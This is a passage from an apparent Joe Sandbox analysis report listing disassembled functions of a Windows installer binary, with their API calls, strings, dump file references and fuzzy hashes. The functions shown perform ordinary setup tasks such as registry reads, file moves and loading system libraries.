                                                                                                                                                                      • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456A9D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                                                                                                      • String ID: LoadTypeLib$RegisterTypeLib
                                                                                                                                                                      • API String ID: 1312246647-2435364021
                                                                                                                                                                      • Opcode ID: e660801773f94f20b04beacac4d0dca05fe01ebd0f05b0c2a082d9499ce0d4df
                                                                                                                                                                      • Instruction ID: dea98cbdfb45d66fad0868bd7db80167fcb8ebb816cd54e6ac056e4ed8ccdf78
                                                                                                                                                                      • Opcode Fuzzy Hash: e660801773f94f20b04beacac4d0dca05fe01ebd0f05b0c2a082d9499ce0d4df
                                                                                                                                                                      • Instruction Fuzzy Hash: A9119670B00604BFDB11DFA6CD51A5EB7BDEB8A705F518476BC04E3652DA389D04CA54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00456F74 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456F8E
                                                                                                                                                                      • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045702B
                                                                                                                                                                      Strings
                                                                                                                                                                      • Failed to create DebugClientWnd, xrefs: 00456FF4
                                                                                                                                                                      • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FBA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                      • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                                                                                                      • API String ID: 3850602802-3720027226
                                                                                                                                                                      • Opcode ID: 50db5baccc0810f74c4546d91cc016e5bb06204da26bb50d10b0ff31faedf516
                                                                                                                                                                      • Instruction ID: 364b6cfc2dd25a83f1288abab6954b7d1953a24f55fd1dbca2d44010d5bb0a44
                                                                                                                                                                      • Opcode Fuzzy Hash: 50db5baccc0810f74c4546d91cc016e5bb06204da26bb50d10b0ff31faedf516
                                                                                                                                                                      • Instruction Fuzzy Hash: 6D110471604240ABD310AB689C81B5F7BD49B15319F55403EFA849B3C3D3794C08C7BE
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00478180 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowkeyboardCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                                                                                                                      • GetFocus.USER32 ref: 004781EB
                                                                                                                                                                      • GetKeyState.USER32(0000007A), ref: 004781FD
                                                                                                                                                                      • WaitMessage.USER32(?,00000000,00478224,?,00000000,0047824B,?,?,00000001,00000000,?,?,?,0047FA10,00000000,004808CA), ref: 00478207
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FocusMessageStateTextWaitWindow
                                                                                                                                                                      • String ID: Wnd=$%x
                                                                                                                                                                      • API String ID: 1381870634-2927251529
                                                                                                                                                                      • Opcode ID: 84218ba3482459bc906772e13e797513dd116e5c3cf85ca98293f9821701720b
                                                                                                                                                                      • Instruction ID: 5f1c8258d991fabeb8ce52e8cfeede19b84d8dc0ceec509adeab196e5a3e054a
                                                                                                                                                                      • Opcode Fuzzy Hash: 84218ba3482459bc906772e13e797513dd116e5c3cf85ca98293f9821701720b
                                                                                                                                                                      • Instruction Fuzzy Hash: C011C430644645AFC700FBA5D845A9E7BF8EB49304B5184BEF408E7651DB386D00CA69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0046E430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E438
                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E447
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time$File$LocalSystem
                                                                                                                                                                      • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                                                                                                      • API String ID: 1748579591-1013271723
                                                                                                                                                                      • Opcode ID: 45f4a363f224ef8c5fed3f77cd0aa38b31e29c1c09915091c8c286ec18076b3a
                                                                                                                                                                      • Instruction ID: 72319f5cb05664b7e116556de8a44c1f4f08e856cbf185e3f572017f7e9d6813
                                                                                                                                                                      • Opcode Fuzzy Hash: 45f4a363f224ef8c5fed3f77cd0aa38b31e29c1c09915091c8c286ec18076b3a
                                                                                                                                                                      • Instruction Fuzzy Hash: 3011F8A440C3919ED340DF6AC44432BBAE4AB99708F04896FF9C8D6381E779C948DB77
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00453F4A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F57
                                                                                                                                                                        • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                                                                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 00453F7C
                                                                                                                                                                        • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$AttributesDeleteErrorLastMove
                                                                                                                                                                      • String ID: DeleteFile$MoveFile
                                                                                                                                                                      • API String ID: 3024442154-139070271
                                                                                                                                                                      • Opcode ID: 265ec3a0b88c4ab1bb24d5df2f4c27fd722eb021d9011ebb2d6ddf22bb6a57e3
                                                                                                                                                                      • Instruction ID: d61ccdf94e8101ca60a50ffa5b16d74e098655775539a7d8992e0f9997158dc0
                                                                                                                                                                      • Opcode Fuzzy Hash: 265ec3a0b88c4ab1bb24d5df2f4c27fd722eb021d9011ebb2d6ddf22bb6a57e3
                                                                                                                                                                      • Instruction Fuzzy Hash: E6F062716041045BD701EBA2D94266EA3ECEB8430EFA0403BB900BB6C3DA3C9E09452D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004559E4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00455A4F,?,00000001,00000000), ref: 00455A42
                                                                                                                                                                      Strings
                                                                                                                                                                      • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004559F0
                                                                                                                                                                      • PendingFileRenameOperations, xrefs: 00455A14
                                                                                                                                                                      • PendingFileRenameOperations2, xrefs: 00455A23
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpen
                                                                                                                                                                      • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                                                                                      • API String ID: 47109696-2115312317
                                                                                                                                                                      • Opcode ID: 31b4b748ac84b0c6d14f01de4d670b5297b47ff71b1e48193c49b5a8be4f9e13
                                                                                                                                                                      • Instruction ID: 0e3b4bd859061d9736a48b3f0c398de546ea7d73752f370084b2b16911b021d7
                                                                                                                                                                      • Opcode Fuzzy Hash: 31b4b748ac84b0c6d14f01de4d670b5297b47ff71b1e48193c49b5a8be4f9e13
                                                                                                                                                                      • Instruction Fuzzy Hash: 31F09671744A08EFDB04D6A6DC62E7A739DD744711FA04477F800D7682DA7DAD04962C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00459184 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592C1,00000000,00459479,?,00000000,00000000,00000000), ref: 004591D1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpen
                                                                                                                                                                      • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                                                                                                      • API String ID: 47109696-2631785700
                                                                                                                                                                      • Opcode ID: c85e332584c2b6b81c3a639e70b22d84b9d58f6f22380bee9693f8bc52febee9
                                                                                                                                                                      • Instruction ID: b3b7ca93e3ee9f71f5f4917cf459f66c0bdee831e94fc7924cf2246e82346dcf
                                                                                                                                                                      • Opcode Fuzzy Hash: c85e332584c2b6b81c3a639e70b22d84b9d58f6f22380bee9693f8bc52febee9
                                                                                                                                                                      • Instruction Fuzzy Hash: 11F0A431300151EBD710EB5AD895B5E7698DB95356F50453BF940CB253C67CCC058B59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00483180 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004831C1
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004831E4
                                                                                                                                                                      Strings
                                                                                                                                                                      • System\CurrentControlSet\Control\Windows, xrefs: 0048318E
                                                                                                                                                                      • CSDVersion, xrefs: 004831B8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                      • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                                                                                                      • API String ID: 3677997916-1910633163
                                                                                                                                                                      • Opcode ID: 198398e296965c7215b1289f33a5d6b68b54bdbfef7e2c49bb596a7d4cf4f99a
                                                                                                                                                                      • Instruction ID: 86ea9b687bc925f919ffd8904499e524e0617f710df10bb4bfec30536caacf1e
                                                                                                                                                                      • Opcode Fuzzy Hash: 198398e296965c7215b1289f33a5d6b68b54bdbfef7e2c49bb596a7d4cf4f99a
                                                                                                                                                                      • Instruction Fuzzy Hash: 84F03175E40208A6DF10EAE18C49BAF73BCAB04F05F104567E910E7281EB7AAB048B59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042D8E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B2E,00000000,00453BD1,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FC1,00000000), ref: 0042D902
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D908
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                      • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                                                                                                      • API String ID: 1646373207-4063490227
                                                                                                                                                                      • Opcode ID: d035f99e557d855bdeeacecbe028982571e55a49ea9d34f7ea87338fabb40367
                                                                                                                                                                      • Instruction ID: 46d83308b3a0af851ef73fb55c1ff88b015d3a0f0a3b668622d7e336d39da5d8
                                                                                                                                                                      • Opcode Fuzzy Hash: d035f99e557d855bdeeacecbe028982571e55a49ea9d34f7ea87338fabb40367
                                                                                                                                                                      • Instruction Fuzzy Hash: F2E0DFE0B00B4122D720257A1C82B5B10894B84768FA0043B3888E52D6EDBCDD841A2D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042EB4C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAC8), ref: 0042EB5A
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB60
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                      • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                                                                                                      • API String ID: 1646373207-260599015
                                                                                                                                                                      • Opcode ID: 0bbb225265d046257374303ec06f1abcd864986d092cdb2b7f80340199a3e0ee
                                                                                                                                                                      • Instruction ID: e22649ab5c5d02c0682c512352339c2c95c689ad11c13297e1ab925b23cbcb3c
                                                                                                                                                                      • Opcode Fuzzy Hash: 0bbb225265d046257374303ec06f1abcd864986d092cdb2b7f80340199a3e0ee
                                                                                                                                                                      • Instruction Fuzzy Hash: B8D0C793711732566910B5FB3CD1DEB098C895427A39400B7F615E5541D55DDC1119AC
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0044F73C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004980FE), ref: 0044F777
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F77D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                      • String ID: NotifyWinEvent$user32.dll
                                                                                                                                                                      • API String ID: 1646373207-597752486
                                                                                                                                                                      • Opcode ID: 755c944164ec903c8f05622b9ec856fdff586270427521b0065f9b923edec2b0
                                                                                                                                                                      • Instruction ID: 704f9416b83fe6db864644e5aa21ade638d5456887e5d0d6230baff76c02d14e
                                                                                                                                                                      • Opcode Fuzzy Hash: 755c944164ec903c8f05622b9ec856fdff586270427521b0065f9b923edec2b0
                                                                                                                                                                      • Instruction Fuzzy Hash: 7DE012F0E4174499FB00BBB97A4671E3AD0E7A471CB00017FF454A62A1DB7C44184F9D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00497E74 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498154,00000001,00000000,00498178), ref: 00497E7E
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497E84
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                      • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                                                                                                      • API String ID: 1646373207-834958232
                                                                                                                                                                      • Opcode ID: e3580c523949225522c14b77a9242b6b01004b6d63d10abe7e45c25823fd25d4
                                                                                                                                                                      • Instruction ID: a447a91dd4d4791f70ca82ece540bd513dbb2543541ea1319c0fea98b289aaf7
                                                                                                                                                                      • Opcode Fuzzy Hash: e3580c523949225522c14b77a9242b6b01004b6d63d10abe7e45c25823fd25d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 61B09280668712549C0032F30C02B2B0C094840728B1000B73414A00C6CE6C9C004A3D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0046441C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0044B650: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
                                                                                                                                                                        • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
                                                                                                                                                                        • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A1
                                                                                                                                                                        • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6B3
                                                                                                                                                                        • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6C5
                                                                                                                                                                        • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6D7
                                                                                                                                                                        • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6E9
                                                                                                                                                                        • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B6FB
                                                                                                                                                                        • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B70D
